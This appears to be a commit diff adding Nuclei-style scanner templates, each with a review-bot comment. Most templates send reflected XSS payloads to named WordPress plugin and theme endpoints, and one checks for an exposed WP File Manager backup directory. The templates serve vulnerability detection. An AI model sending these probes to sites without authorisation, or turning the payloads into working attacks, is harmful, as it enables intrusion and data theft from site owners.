

20241216
actions-user committed Dec 16, 2024
1 parent dc2bed7 commit a4d1be1
Showing 14 changed files with 450 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241215
20241216
12 changes: 12 additions & 0 deletions poc.txt
Expand Up @@ -9217,6 +9217,7 @@
./poc/cve/CVE-2011-5104.yaml
./poc/cve/CVE-2011-5106-0fc17edc7d5f98d9cb422a6dd7ebeea2.yaml
./poc/cve/CVE-2011-5106-2093.yaml
./poc/cve/CVE-2011-5106-2094.yaml
./poc/cve/CVE-2011-5106-2096.yaml
./poc/cve/CVE-2011-5106.yaml
./poc/cve/CVE-2011-5107-2098.yaml
Expand Down Expand Up @@ -9869,6 +9870,7 @@
./poc/cve/CVE-2013-4462-16944fdd8879fb55f44fca776684e221.yaml
./poc/cve/CVE-2013-4462.yaml
./poc/cve/CVE-2013-4625-2266.yaml
./poc/cve/CVE-2013-4625-2267.yaml
./poc/cve/CVE-2013-4625-2269.yaml
./poc/cve/CVE-2013-4625-2270.yaml
./poc/cve/CVE-2013-4625-2271.yaml
Expand Down Expand Up @@ -10308,6 +10310,7 @@
./poc/cve/CVE-2014-4549-4415191f19cc09b59219e8dec440ebce.yaml
./poc/cve/CVE-2014-4549.yaml
./poc/cve/CVE-2014-4550-2363.yaml
./poc/cve/CVE-2014-4550-2364.yaml
./poc/cve/CVE-2014-4550-2366.yaml
./poc/cve/CVE-2014-4550-7c5b0f3fc5ba45d02029313feb89dfd7.yaml
./poc/cve/CVE-2014-4550.yaml
Expand Down Expand Up @@ -11994,6 +11997,7 @@
./poc/cve/CVE-2016-1000132-eca521eb466c9a0703b816e37fd90898.yaml
./poc/cve/CVE-2016-1000132.yaml
./poc/cve/CVE-2016-1000133-2671.yaml
./poc/cve/CVE-2016-1000133-2673.yaml
./poc/cve/CVE-2016-1000133-2675.yaml
./poc/cve/CVE-2016-1000133-68f0438e7e19c3eabe08c84e10c94850.yaml
./poc/cve/CVE-2016-1000133.yaml
Expand Down Expand Up @@ -12023,6 +12027,7 @@
./poc/cve/CVE-2016-1000138-b8f6488df350796223032f6ce8716f9c.yaml
./poc/cve/CVE-2016-1000138.yaml
./poc/cve/CVE-2016-1000139-2699.yaml
./poc/cve/CVE-2016-1000139-2701.yaml
./poc/cve/CVE-2016-1000139-2702.yaml
./poc/cve/CVE-2016-1000139-5a043184256624a09d5739ac78a02adf.yaml
./poc/cve/CVE-2016-1000139.yaml
Expand Down Expand Up @@ -16017,6 +16022,7 @@
./poc/cve/CVE-2020-16952.yaml
./poc/cve/CVE-2020-1721.yaml
./poc/cve/CVE-2020-17362-4655.yaml
./poc/cve/CVE-2020-17362-4658.yaml
./poc/cve/CVE-2020-17362-4659.yaml
./poc/cve/CVE-2020-17362-b8d1258d5e487d3809196efa7cebb656.yaml
./poc/cve/CVE-2020-17362.yaml
Expand Down Expand Up @@ -16263,6 +16269,7 @@
./poc/cve/CVE-2020-24312 2.yaml
./poc/cve/CVE-2020-24312-4805.yaml
./poc/cve/CVE-2020-24312-4806.yaml
./poc/cve/CVE-2020-24312-4809.yaml
./poc/cve/CVE-2020-24312-694d378ae813237a53116c0909956f7b.yaml
./poc/cve/CVE-2020-24312.yaml
./poc/cve/CVE-2020-24313-48b0049e9e24d640a7ebc6488377fcfd.yaml
Expand Down Expand Up @@ -16324,6 +16331,7 @@
./poc/cve/CVE-2020-25213 (copy 3).yaml
./poc/cve/CVE-2020-25213 (copy 4).yaml
./poc/cve/CVE-2020-25213 2.yaml
./poc/cve/CVE-2020-25213-4859.yaml
./poc/cve/CVE-2020-25213-6ed17b06b9c110d64b1d678d881598e8.yaml
./poc/cve/CVE-2020-25213.yaml
./poc/cve/CVE-2020-25223.yaml
Expand Down Expand Up @@ -17848,6 +17856,7 @@
./poc/cve/CVE-2021-24285-1e351fe03157cfef97611aeb987561d8.yaml
./poc/cve/CVE-2021-24285-5670.yaml
./poc/cve/CVE-2021-24285-5672.yaml
./poc/cve/CVE-2021-24285-5673.yaml
./poc/cve/CVE-2021-24285-5674.yaml
./poc/cve/CVE-2021-24285.yaml
./poc/cve/CVE-2021-24286-bb438ca91bbe39dc03a706e917de013b.yaml
Expand Down Expand Up @@ -22305,6 +22314,7 @@
./poc/cve/CVE-2022-1904.yaml
./poc/cve/CVE-2022-1905-db75ed3ff774aa6d3618ad6cf3e0e045.yaml
./poc/cve/CVE-2022-1905.yaml
./poc/cve/CVE-2022-1906(1).yaml
./poc/cve/CVE-2022-1906-03caf3c7a1b0d8e8f3c37fe1e9fa9ab3.yaml
./poc/cve/CVE-2022-1906.yaml
./poc/cve/CVE-2022-1910-93ea6643da587ac5ea832cdf0673e032.yaml
Expand Down Expand Up @@ -122385,6 +122395,7 @@
./poc/remote_code_execution/rce-shellshock-user-agent-9833.yaml
./poc/remote_code_execution/rce-shellshock-user-agent.yaml
./poc/remote_code_execution/rce-shellshock-user-agent.yml
./poc/remote_code_execution/rce-user-agent-shell-shock.yaml
./poc/remote_code_execution/rce-via-java-deserialization.yaml
./poc/remote_code_execution/rce-vuln-params.yaml
./poc/remote_code_execution/rce.yaml
Expand Down Expand Up @@ -145609,6 +145620,7 @@
./poc/wordpress/wp_estimation_form-74fbc2e4c2e32c4d2b634afb2b8ecbeb.yaml
./poc/wordpress/wp_estimation_form-e9e57f3dfd561856803278afb5b47825.yaml
./poc/wordpress/wp_estimation_form.yaml
./poc/wordpress/wp_go_maps.yaml
./poc/wordpress/wp_rokbox-0cfa11f72f29067bcfed3c12b6981b57.yaml
./poc/wordpress/wp_rokbox-0f455c4138587ce49a9a690f3ce6eb8e.yaml
./poc/wordpress/wp_rokbox-10af3a9811748946c98408da9dbde995.yaml
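--- a/poc/cve/CVE-2011-5106-2094.yaml
+++ b/poc/cve/CVE-2011-5106-2094.yaml
@@ -0,0 +1,30 @@
+id: CVE-2011-5106
+
+info:
+name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106
+tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200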
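Review bot: The `info` block lacks the `classification` entry (cvss-metrics, cvss-score, cve-id, cwe-id) that CVE-2014-4550-2364.yaml and the other templates in this commit carry, and gives `reference` as a bare scalar where they use a list, so tooling that filters on `classification.cwe-id` will not see this template. Add `classification:` with `cve-id: CVE-2011-5106` and `cwe-id: CWE-79` (NVD's vector can be copied in as `cvss-metrics`), and turn `reference` into a one-item list. The three matchers only prove that the payload is echoed in a 200 `text/html` response; nothing ties the page to the plugin, so a second body word that fingerprints the edit-post.php page under `condition: and`, as CVE-2016-1000139-2701.yaml does, would reduce false positives from any handler that echoes the query string.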
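--- a/poc/cve/CVE-2013-4625-2267.yaml
+++ b/poc/cve/CVE-2013-4625-2267.yaml
@@ -0,0 +1,25 @@
+id: CVE-2013-4625
+info:
+name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
+tags: cve,cve2013,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200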
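Review bot: The `path` line sends `remove=1` alongside the XSS payload to `installer.cleanup.php`, while the NVD text in `description` attributes the flaw to the `package` parameter only; a parameter named `remove` on a script whose job is installer cleanup reads like an action that deletes files on the target, which would make this scan non-read-only. Confirm against the plugin source whether the reflection also occurs without it and drop it if so; if it is required to reach the reflecting code path, record that, e.g. `# remove=1 is needed to reach the reflecting branch; note that it may trigger the plugin's cleanup action on the target`. This template also omits the `classification` block (`cwe-id: CWE-79` plus the CVSS vector) that the sibling XSS templates in this commit carry.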
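--- a/poc/cve/CVE-2014-4550-2364.yaml
+++ b/poc/cve/CVE-2014-4550-2364.yaml
@@ -0,0 +1,32 @@
+id: CVE-2014-4550
+info:
+name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
+author: daffainfo
+severity: medium
+reference: |
+- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
+- https://nvd.nist.gov/vuln/detail/CVE-2014-4550
+tags: cve,cve2014,wordpress,wp-plugin,xss
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.10
+cve-id: CVE-2014-4550
+cwe-id: CWE-79
+description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "'><script>alert(document.domain)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200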
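Review bot: The plugin directory in the `path` line appears to be spelled `shortcode–ninja` with a non-ASCII dash (U+2013) between the two words, whereas every other separator in that URL is an ASCII hyphen; a request to that path will not reach the plugin, so the template cannot match a vulnerable host. Replace the directory with `shortcode-ninja` (ASCII hyphen) and confirm the fixed path reproduces before merging, since with the current spelling the template cannot have produced a true positive. Separately, `reference: |` turns the two URLs into one literal-block string instead of the list the sibling templates use; drop the `|` so each `- https://…` line is a list item.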
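--- a/poc/cve/CVE-2016-1000133-2673.yaml
+++ b/poc/cve/CVE-2016-1000133-2673.yaml
@@ -0,0 +1,39 @@
+id: CVE-2016-1000133
+
+info:
+name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
+reference:
+- https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
+- https://wordpress.org/plugins/forget-about-shortcode-buttons
+- http://www.vapidlabs.com/wp/wp_advisory.php?v=602
+- http://www.securityfocus.com/bid/93869
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.1
+cve-id: CVE-2016-1000133
+cwe-id: CWE-79
+tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200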
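Review bot: `description` ("Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1") does not name the vulnerable script or parameter, both of which are only recoverable from the URL in the `path` line; suggest `description: Reflected XSS in the forget-about-shortcode-buttons plugin 1.1.1 for WordPress via the ver parameter of assets/js/fasc-buttons/popup.php`. The body matcher looks only for the echoed payload; adding a second word specific to the popup page under `condition: and`, as CVE-2016-1000139-2701.yaml does with `input type="text" name="ContactId"`, would keep a generic echoing handler from producing a hit. Note also that `name` drops the `WordPress Plugin` prefix used by the other templates in this commit, which matters for anyone listing templates by product.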
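--- a/poc/cve/CVE-2016-1000139-2701.yaml
+++ b/poc/cve/CVE-2016-1000139-2701.yaml
@@ -0,0 +1,39 @@
+id: CVE-2016-1000139
+
+info:
+name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
+author: daffainfo
+severity: medium
+reference:
+- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
+- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
+tags: cve,cve2016,wordpress,wp-plugin,xss
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.10
+cve-id: CVE-2016-1000139
+cwe-id: CWE-79
+description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11"
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- '"><script>alert(document.domain);</script><"'
+- 'input type="text" name="ContactId"'
+condition: and
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200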
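Review bot: The `description` says only "Reflected XSS in wordpress plugin infusionsoft v1.5.11" while `name` says `<= 1.5.11`; the two disagree on the version bound, and neither names the script or parameter that the `path` line exercises. Suggest `description: Reflected XSS in the Infusionsoft Gravity Forms add-on <= 1.5.11 for WordPress via the ContactId parameter of Infusionsoft/examples/leadscoring.php`. The two-word body matcher with `condition: and` (payload plus `input type="text" name="ContactId"`) is the pattern the other XSS templates in this commit should copy: it ties the reflection to the leadscoring page rather than to any handler that echoes input.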
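--- a/poc/cve/CVE-2020-17362-4658.yaml
+++ b/poc/cve/CVE-2020-17362-4658.yaml
@@ -0,0 +1,40 @@
+id: CVE-2020-17362
+
+info:
+name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
+reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
+tags: cve,cve2020,wordpress,xss,wp-plugin
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.10
+cve-id: CVE-2020-17362
+cwe-id: CWE-79
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+
+- type: word
+words:
+- "nova-lite"
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200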
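Review bot: `tags` carries `wp-plugin`, but `description` states Nova Lite is a theme and the probe is the site-wide search endpoint `/?s=`, with only the `nova-lite` body word tying a hit to the theme; the tag should be `wp-theme` — `tags: cve,cve2020,wordpress,xss,wp-theme` — or tag-based filtering will route this template with plugin checks. `reference` is a single wpscan URL while the sibling templates list the NVD entry as well; add `- https://nvd.nist.gov/vuln/detail/CVE-2020-17362` as a list item. The `nova-lite` fingerprint is a bare substring of the whole body; if it is meant to match the theme's asset URLs, `/wp-content/themes/nova-lite/` is a narrower word that is less likely to match unrelated page content.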
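--- a/poc/cve/CVE-2020-24312-4809.yaml
+++ b/poc/cve/CVE-2020-24312-4809.yaml
@@ -0,0 +1,37 @@
+id: CVE-2020-24312
+
+info:
+name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure
+author: x1m_martijn
+severity: high
+description: |
+mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.
+reference:
+- https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/
+- https://nvd.nist.gov/vuln/detail/CVE-2020-24312
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+cvss-score: 7.5
+cve-id: CVE-2020-24312
+cwe-id: CWE-552
+tags: cve,cve2020,wordpress,backups,plugin
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/'
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- 'Index of'
+- 'wp-content/uploads/wp-file-manager-pro/fm_backup'
+- 'backup_'
+condition: and
+
+# Enhanced by mp on 2022/04/08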
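Review bot: `description` says the exposed directory is `fm_backups` and `name` identifies the plugin as `wp-file-manager`, but the `path` line probes `/wp-content/uploads/wp-file-manager-pro/fm_backup/` (singular, and under the `-pro` directory) and the second matcher word hard-codes that same path; at least one of the two is wrong, and as written an install whose listing sits under a differently named directory is not detected. Confirm the directory name(s) against the plugin source, and if both layouts exist, list both under `path`, drop the path-specific word so `Index of` and `backup_` decide, and add `stop-at-first-match: true` so one host does not report twice. `tags` uses `plugin` where every other template in this commit uses `wp-plugin`, which breaks tag-based filtering. The detection also depends on autoindex being enabled (`Index of`); a host that has the listing disabled but still serves the backup files is missed, which is worth a comment next to the matcher, e.g. `# relies on directory listing; backup files may still be downloadable when autoindex is off`.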

